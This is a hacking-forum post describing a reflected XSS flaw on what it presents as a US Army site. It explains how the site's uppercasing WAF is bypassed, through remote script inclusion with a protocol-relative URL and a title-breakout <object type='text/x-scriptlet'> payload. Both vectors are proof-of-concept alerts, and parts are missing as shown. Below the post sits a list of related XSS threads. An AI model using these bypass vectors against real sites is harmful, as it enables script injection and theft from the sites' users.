US Army - Reflective XSS - WAF Bypassed
HTML Injection:


WAF converts all lowercase inputs to uppercase, javascript (being case sensitive) therefore does not execute in the intended manner, stopping an alert from being achieved. There are a few ways of bypassing this:

Method 1 (working in IceWeasel but not firefox):

the following vector can be used to remotely include the javascript, using // in place of http:// to bypass another filter put in place:


this gets arounf the case sensitivity issue, with the contents of 1.JS being <script>alert("something")</script>

Method 2 (working in multiple browsers):

Now time for an agnostic vector using the <object> tag to remotely include some javascript:

"></title><object type="text/x-scriptlet" data=""></object>


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] XSS through Exif headers Insider 1 546 06-16-2020, 11:51 AM
Last Post: LaZr4us
  Guide to XSS (Examples included) NO-OP 3 12,376 04-29-2019, 12:44 PM
Last Post: mhiats37
  [PoC] x - Stored XSS Vulnerabilities (Bug Bounty Hunting) Daisuke Dan 3 5,754 04-24-2019, 08:47 PM
Last Post: thunder
  Exploiting Reflective XSS (Post) Insider 1 4,181 04-24-2019, 08:32 PM
Last Post: thunder